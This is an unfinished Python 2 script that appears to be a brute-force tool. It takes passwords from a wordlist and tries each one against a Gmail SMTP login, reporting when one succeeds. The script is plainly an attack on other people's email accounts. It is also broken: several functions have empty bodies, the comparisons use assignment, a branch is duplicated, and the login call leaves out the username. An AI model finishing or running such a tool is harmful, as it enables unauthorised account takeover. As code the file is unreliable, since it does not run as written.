#up to 512 bit passcode must be cracked
#all characters

import os
import sys
import random
import smtplib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

#options

type_of_paswords = raw_input("number of bits in password? ie: 16,32,64...512")
while type_of_paswords != "16" and type_of_paswords != "32" and type_of_paswords != "64" and type_of_paswords != 128 and type_of_paswords != "256" and type_of_paswords != "512":
  type_of_paswords = raw_input("no you did it wrong, put a base two number between 16 and 512")

passwfile = raw_input("Enter the password file name: ")
passwfile = open(passwfile, "r")


password = "placce_holder"


def bitscreate16():
def bitscreate32():
def bitscreate64():
def bitscreate128():
def bitscreate256():
def bitscreate512():


if type_of_paswords = "16":
  bitscreate16()
elif type_of_paswords = "32":
  bitscreate32()
elif type_of_paswords = "64":
  bitscreate64()
elif type_of_paswords = "128":
  bitscreate128()
elif type_of_paswords = "256":
  bitscreate256()
elif type_of_paswords = "256":
  bitscreate512()
else:
  print "Error"



for password in passwfile:
  try:
    smtpserver.login(password)
  
    print "[+] Password Found %s" % password
    break;
  except smtplib.SMTPAuthenticationError:
    print "[!] Password Incorrect: %s" % password
